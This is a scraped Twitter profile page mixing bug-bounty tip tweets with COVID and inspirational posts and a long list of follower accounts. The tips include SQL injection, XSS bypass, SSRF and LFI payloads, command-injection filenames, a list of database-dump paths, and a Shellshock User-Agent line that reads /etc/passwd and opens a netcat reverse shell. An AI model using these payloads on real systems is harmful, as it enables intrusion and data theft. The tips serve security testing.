Baba Fakruddin @babapdtr
Senior Software Engineer - MNC Texas, USA Joined August 2014-
Tweets392
-
Followers171
-
Following2K
-
Likes135
Bug Bounty Tips This is how to find sql-Injection 100% of the time /?q=1 /?q=1' /?q=1" /?q=[1] /?q[]=1 /?q=1` /?q=1\ /?q=1/*'*/ /?q=1/*!1111'*/ /?q=1'||'asd'||' <== concat string /?q=1' or '1'='1 /?q=1 or 1=1 /?q='or''=' #bugbounty #bugbountyTips #SQLinjection
Android SSL pinning bypass methods — One click SSL pinning bypass in Genymotion by @zombie007o bit.ly/35XC1JI SSL Pinning bypass using Xposed framework bit.ly/34MQR6v by @ITSecurityguard bit.ly/2HTlTAQ #infosec #bugbounty #cybersecurity
Meet Padmashila Tirpude, mother of two kids from Bhandara, Maharashtra. She used to sell heavy stone blocks (सिल-बट्टा) for a living. In 2017, she cleared her MPSC examination & became a police Sub-Inspector. Salute to her confidence & determination. Impossible is nothing!!
Common forgotten database dumps: /back.sql /backup.sql /accounts.sql /backups.sql /clients.sql /customers.sql /data.sql /database.sql /database.sqlite /users.sql /db.sql /db.sqlite /db_backup.sql /dbase.sql /dbdump.sql /setup.sql /sqldump.sql /dump.sql /mysql.sql /temp.sql
Chaining file uploads with other vulns:- Set filename to:- > ../../../tmp/lol.png for path traversals > sleep(10)-- -.jpg for SQLi. > <svg onload=alert(document.comain)>.jpg/png for xss > ; sleep 10; for command injections #bugbountytips
Test on CGI (cgi-bin) User-Agent: () { :;}; echo $(</etc/passwd) () { :;}; /usr/bin/nc ip 1337 -e /bin/bash
This 105-year-old woman with co-morbid conditions from Andhra Pradesh's Kurnool has defeated #COVID19 with proper diet, medication and regular yoga. @xpressandhra @Kalyan_TNIE @MoHFW_INDIA @PMOIndia @PrabhuChawla @gsvasu_TNIE
A simple XSS Bypass Payload '"></script><img src=x onerror=prompt(`XSSED`)> blocked as : '"> script><img src=x onerror=prompt(`XSSED`)> Bypass: '"><%252fscript><img src=x onerror=prompt(`XSSED`)> Try once if u want😉🙂 #xss #Bypass #bugbountytips #bugbounty
Humbly appeal to all RECOVERED Covid-19 patients to come forward & DONATE PLASMA to SAVE LIVES. There can be no greater humanitarian gesture in these times of unprecedented crisis. Covid-19 Warriors, Be Saviors Now! donateplasma.scsc.in @TelanganaDGP @TelanganaCOPs
Humbly appeal to all RECOVERED Covid-19 patients to come forward & DONATE PLASMA to SAVE LIVES. There can be no greater humanitarian gesture in these times of unprecedented crisis. Covid-19 Warriors, Be Saviors Now! donateplasma.scsc.in @TelanganaDGP @TelanganaCOPs
XXE SSRF INJECTION aisecureme.com/xxessrf-inject…
Ffuf v1.1.0 is out! github.com/ffuf/ffuf/rele… New stuff explained in thread below 👇
SSRF payloads http://[::]:80/ http://[::]:25/ SMTP http://[::]:22/ SSH http://[::]:3128/ http://0000::1:80/ http://0000::1:25/ SMTP http://0000::1:22/ SSH http://0000::1:3128/ http://0177.0.0.1/ http://2130706433/ = http://127.0.0.1 http://3232235521/ http://192.168.0.1 #kongsec
I know it's common sense but remember when parsing JS for endpoints/files: / = Root directory . = This location .. = Up a directory ./ = Current directory ../ = Parent of current directory ../../ = Two directories backwards #bugbountytips ?
Wildcard bypass & LFI 1. Intercepted a POST req that pointed to a local file "/usr/local/redacted/filename" 2. tried "/etc/passwd" -> bad request 3. "/user/local/../../etc/passwd" -> bad request 4. "/user/local/redacted/../../../etc/passwd" -> OK 5. LFI & bounty #BugBountyTips
Tip by @RahulKankrale Scheme verification bypass using Line Feed & Parameter pollution if only https/http schemes allowed then using %0A & parameter pollution it is possible to bypass this restriction. scheme://route?uri=http%0A&uri=protected_scheme://auth #bugbountytip

Karen Cronin @KarenCroni9230
73 Followers 4K Following
Colby Rice @CRice56791
72 Followers 4K Following
Cindy @cindygrubbs36
273 Followers 3K Following
Soshoaez @Soshoaez0yz4NU
1 Followers 74 Following
Fayazahammad T @Fayazahamm14551
1 Followers 75 Following
Bute AI Cryptocurrenc... @bU4Ho539xJFIUqK
2 Followers 156 Following No need to keep watch the market . 24 hours for FREE TRY , profit earning 1k-10k USDT profit per day! https://t.co/66qG0Kmuig
BerylHosea @bB0eXu31GtEnu
24 Followers 2K Following
Seighsm @Seighsm139250
37 Followers 1K Following I live alone now and enjoy business, traveling, shopping, food and music. I have a calm personality and I hope we can be friends.
Tealockan @tealockan72350
44 Followers 1K Following I live alone now and enjoy business, traveling, shopping, food and music. I have a calm personality and I hope we can be friends.
Shiva Sai @shiva_786
3 Followers 99 Following
Donta McDaniel @donta_mcdaniel
0 Followers 3 Following
Fayazahammad @Fayazahammad3
5 Followers 77 Following
Scott Bollinger @kfalconspb
32K Followers 22K Following Long time IT pro and excertification junkie. Virtualization, Security, Networks, and Tacos!
Rehana Guduru @RehanaGuduru
0 Followers 34 Following
Fat @fattselimi
16K Followers 9K Following Chasing Positive vibes only & Ethical Hacking for fun and profit🧑🍳
h1p 🇨🇴 @hipdead010
6K Followers 675 Following scripter ►infosec ► cybersecurity all the time ►bugbounty programs ►Ethical Hacking ►Security Researcher
BUGRA GUMUS @bugragumus
3K Followers 4K Following IT Specialist. IP Networking,Web Security and Web Application Firewalls, SD-Wan, opensource firewalls, wifi, cloud services, and computing.(went phishing)
༒Nerdy ᭄Genii࿐�... @Nerdy_genii
2K Followers 4K Following nothing special here, just your regular appsec guy and a Senior Penetration tester.
Chris Hanlon @ChrisHanlonCA
17K Followers 18K Following Security Engineer Google Security Hall of Fame Presenter & Workshop host at #BSidesLV and #DEFCON
FtoIS @apteerr
48 Followers 1K Following
H4T4WAY @H4t4Way
423 Followers 2K Following OSCP | eWPT | CNSS | WAS C4 Warden @code4rena Lover of WebSec | SRT @SynackRedTeam #hacking #bugbounty https://t.co/w5SOQffePr… https://t.co/OvJkCLMj4M
SuRb0 @surbo
2K Followers 1K Following There is no such thing as Cheating in Hacking ( Tweets are just 1s & 0s that belong to me) - ♥️& RT ≠ endorsement
Jon Moore - Voyageur ... @jdmoore0883
671 Followers 5K Following Linux Guru, Network Security Engineer, Raspberry Pi Enthusiast
Ajay Anand CTG @ctgsecurity
585 Followers 452 Following Contact us for Training/Services *Source Code Review (PHP/Java/Dot Net) *Web Application/Network Security *Mobile(Android/iOS) Application Penetration Testing
R4T | ねずみ | Nez... @ratilovich
574 Followers 908 Following RedTeam Operator | OSEP | OSCP | eCPTXv2 | CRTE | CRTP | RTO2 | Military Intelligence | https://t.co/hOaGzR8H4X | Opinions Are Mine
bm54b30 @bm54b30
1 Followers 20 Following
Jack Daniel @JDNashFarms
86 Followers 2K Following
Mohamed Abde|kader @ProV1DoR
117 Followers 611 Following Never Lost, Never Arrived عجبا لِغُزَاة لا تُعصَى
AppSec Village @AppSec_Village
11K Followers 6K Following AppSec Village @DEFCON & @RSAConference A volunteer-run, non-profit focused on education, awareness, and community. Founded by @erezyalon and @tzionit411.
Olivia evelyn Anita R @EvelynOliviaeve
1K Followers 5K Following there must be an oppoturnity that will take you to your next destination
aslak hellesund @AslakHellesund
108 Followers 2K Following
Luís Felipe @luislfpfelipe
329 Followers 3K Following
rapiddns @rapiddns
3K Followers 3K Following Bug Bounty Hunter. The https://t.co/11fvDW8SRb is a free, open and unlimited dns query tool. It makes easy to query subdomains or sites of the same.
Mark Anderson @markhanderson
202 Followers 1K Following Husband, Father, Technologist, Cisco SE, Opinions are my own. #CiscoSE
zentreax.⚡ @zentreaxdev
288 Followers 643 Following Top 10 EU @hackthebox_eu (was) | Security Researcher & Developer
n00bhaxor (@n00bhaxor... @n00b_haxor
137 Followers 443 Following husband, father, infosec geek, pen tester, breaker of things. alien space-hacker, Views and opinions are my own.
Kate Brew @securitybrew
28K Followers 16K Following Mom, Moderate common sense engineer #owasp #lasconatx @GeorgiaTech alum. Funemployed. No one knows what I’m up to.
Charles Shirer @bsdbandit
25K Followers 27K Following A Hacker who is A Lover of People, and Life @RetroTwinz @Secbsd, @GrumpyHackers, @NovaHackers, @deadpixelsec @hacknotcrime Advocate @PositivelyBlue_ OSCP, OSWP
Priyanshu @priyanshu_xo
2K Followers 662 Following full time bug bounty hunter https://t.co/Z1PExchTcf
ANI @ANI
9.2M Followers 0 Following Asian News International. Multi-media news agency, content for information platforms: TV, Internet, broadband,newspapers, mobiles https://t.co/eEMPAbzEwU
Lakshay @inn0c3ntd3v1L
734 Followers 499 Following Cyber Security | OSCP | OSWP | Bug Bounty Hunter | Founder - Cyber Phoenix Conclave | Head - Hackersday Haryana |
YSRCP Europe @YSRCPEurope
6K Followers 249 Following Diaspora champions rallying for Jagan Mohan Reddy's transformative leadership in Andhra Pradesh. Committed to amplifying the impact of his pioneering policies.
Amaravati Nexus @AmaravatiNexus
7K Followers 5 Following Explore the essence and evolution of Andhra Pradesh’s capital, from its historic roots to its vibrant future✨
వై.యస్.�... @_Ysrkutumbam
13K Followers 619 Following Official campaign account highlighting @ysjagan 's remarkable governance in #AndhraPradesh గడప వద్దకే పాలన.. మన జగనన్న పాలన, నాడు రాజన్న నేడు జగనన్న. #YSRCP
Just a thought @Think_Blink09
2K Followers 593 Following My thoughts on Sports, Politics, Food , Travel and Cinema. In this biased world, I listen to argument from both sides and stand on what I think is right.
YS Jagan Trends @YSJaganTrends
135K Followers 3 Following Official Trends Page of JANANETHA @ysjagan anna 🚩
Alla Ramakrishna Redd... @RK1247_official
17K Followers 7 Following Alla Ramakrishna Reddy(Rk) || YSR Congress Party || Ex-MLA Mangalagiri || Andhra Pradesh.
Nandigam Suresh Babu ... @NandigamSuresh7
54K Followers 6 Following Former Member of Parliament Bapatla YSR Congress Party - Andhrapradesh
Rajini Vidadala @VidadalaRajini
186K Followers 1 Following Ex-Minister of Health,Family Welfare & Medical Education, GoAP | Saree Connoisseur
Y V Subba Reddy @yvsubbareddymp
90K Followers 60 Following MP - Rajya Sabha | @YSRCParty Parliamentary Party President
The Wire @thewire_in
1.4M Followers 440 Following India's foremost independent news-site, carrying investigations, reportage and critical opinions. Click here to: https://t.co/014NSaHbOK
Anitha Reddy @Anithareddyatp
92K Followers 1K Following CM YS జగనన్న చెల్లి - అనంతపురం https://t.co/N8WV7F94WA https://t.co/0iFeKqP0lM
YS Jagan Times @YSJaganTimes
3K Followers 40 Following #YSJaganTimes is a Volunteer Digital Publisher, Completely Dedicated to cover the Best Times of @ysjagan
Bond-ImhOG 🚩 @BondImhOG
3K Followers 2K Following
G@bb4r 🇮🇳🇮�... @Gabb4r
303 Followers 171 Following Just a hacker for fun xD | Mastering the dark arts of Technologies | eJPT | CEH | OSCP | CPTS | CPENT | LPT Master
Nitish Kumar Reddy @NKReddy07
73K Followers 24 Following Official Account | India 🇮🇳 | Andhra | Sunrisers Hyderabad | For Enquiries: [email protected]
venkatesh Tenali @venkateshT51708
3K Followers 515 Following Andhra https://t.co/anE3J3ls4v join my WhatsApp channel https://t.co/YRfncNr4IR
Jagananna Connects @JaganannaCNCTS
336K Followers 146 Following Official Social Media Wing of YSR Congress Party
DevSecCon @devseccon
7K Followers 2K Following The DevSecCon community brings developers, operations, and security practitioners together to learn from one another and forge the future of secure development.
Practical DevSecOps @PDevsecops
2K Followers 104 Following The DevSecOps, AI Security and AppSec Training and Certification
Tech Fusionist @techyoutbe
49K Followers 2K Following Bridging Tech Gaps → AI | Cloud | No-Code | DevOps | Security 🚀 Sharing insights, tools & trends 🤝 DM for collabs or partnerships @TTechFusionist
greatandhra @greatandhranews
87K Followers 6 Following Breaking news alerts from Andhra and Telangana WhatsApp Channel: https://t.co/LDS4rEedCa
Kumar (Pawan and Modi... @JSPWorks
6K Followers 817 Following IT Consultant. Telangana & Andhra. It’s always Pawan Kalyan in politics. #Janasena & #BJP admirer. Sanathani 🔯🕉️ Modi 3.0
PentestGPT @PentestGPT
22K Followers 0 Following AI-Powered Penetration Testing Assistant for offensive security testing, focused on web applications and network penetration testing.
Revathi @revathitweets
37K Followers 1K Following Journalist. Truth-seeker. Unapologetic. Andhra/Telangana ప్రశ్నిద్దాం-పోరాడుదాం
Anchor Shyamala @AnchorShyamala
23K Followers 45 Following Hello everyone..👉👉👉this is your Shyamala FanClub :)
Anurag Kashyap @anuragkashyap72
1.3M Followers 328 Following Neither Left nor Right or Centre . I am Diagonal . Most times I make movies
Swara Bhasker @ReallySwara
2.1M Followers 663 Following Girl crush advocate. 😍😬🤷🏽♀️ Part time actor, full time Twitter pest. Chaos Queen. Shopping my way through the apocalypse. Free Palestine ! 🇵🇸 🇮🇳❤️
Sukumar Writings @SukumarWritings
46K Followers 44 Following A Tollywood Production Company Owned By Well-Acclaimed Director Sukumar.
Rahamath Pasha @itsrahamathp
4K Followers 62 Following Journalist, Indian, Chasing truth, Telling Facts, Bridging the gap between news and understanding, Exploring the stories behind the headlines.
Inturi Ravi Kiran @InturiKiran7
11K Followers 179 Following
Dr KA Paul @KAPaulOfficial
20K Followers 2 Following Worlds Most Popular Evangelist | Founder of Global Peace Initiative | International Peacemaker | PRAJA SHANTHI PARTY President
SNV Sudhir @sudhirjourno
2K Followers 388 Following @StateIVLP participant -NewsJunkie- Journalist @deccanherald ex Bureau Chief @TheDailyPioneer & @DeccanChronicle-views are personal & RTs are not endorsements!
YSRCP USA @ysrcp_usa
27K Followers 2K Following Follow us on Fb: https://t.co/6qgoI4xNdy .IG : https://t.co/aQX9fP8gy7 , https://t.co/Uk0khxODvv
Dhruv Rathee @dhruv_rathee
3.1M Followers 615 Following YouTuber: 25 million+ subs⚡️TIME Magazine’s Next Generation Leaders 2023 • Traveller •
YSRCP IT WING Officia... @ysrcpitwingoff
17K Followers 7 Following If You Have One Reason To Dislike Him, We Have Thousands Of Reasons To Love Him 💙🤍💚
Andhra Progress @AndhraProgress
3K Followers 4 Following 𝐅𝐎𝐑 𝐋𝐀𝐓𝐄𝐒𝐓 𝐀𝐏 𝐃𝐄𝐕𝐄𝐋𝐎𝐏𝐌𝐄𝐍𝐓 𝐔𝐏𝐃𝐀𝐓𝐄𝐒 𝐀𝐍𝐃𝐇𝐑𝐀 𝐏𝐑𝐎𝐆𝐑𝐄𝐒𝐒 𝟐𝟒/𝟕 𝗘𝗡𝗔𝗕𝗟𝗘 🔔 𝗜𝗖𝗢𝗡 𝗙𝗢𝗥 𝗡𝗢𝗧𝗜𝗙𝗜𝗖𝗔𝗧𝗜𝗢𝗡𝗦
Andhra Pradesh Infra ... @APInfraStory
16K Followers 40 Following Updates On Social & Industrial, Infrastructure Development In Andhra Pradesh
Rahul @2024YCP
30K Followers 2 Following Daily Former Chief Minister @ysjagan live Updates 24x7...My Old Account Suspended @2024YSRCP (102k followers) జగనన్నతో పాటు 14 నెలలు పాదయాత్రలో నడిచాను✨
Pwned Labs @PwnedLabs
2K Followers 68 Following Pwned Labs delivers fun and immersive cybersecurity training experiences for individuals and businesses. Join the community: https://t.co/kyG413GZDa
Imamul Mursalin @d3f7ult
4K Followers 397 Following Security enthusiast aka Cyber Security Researcher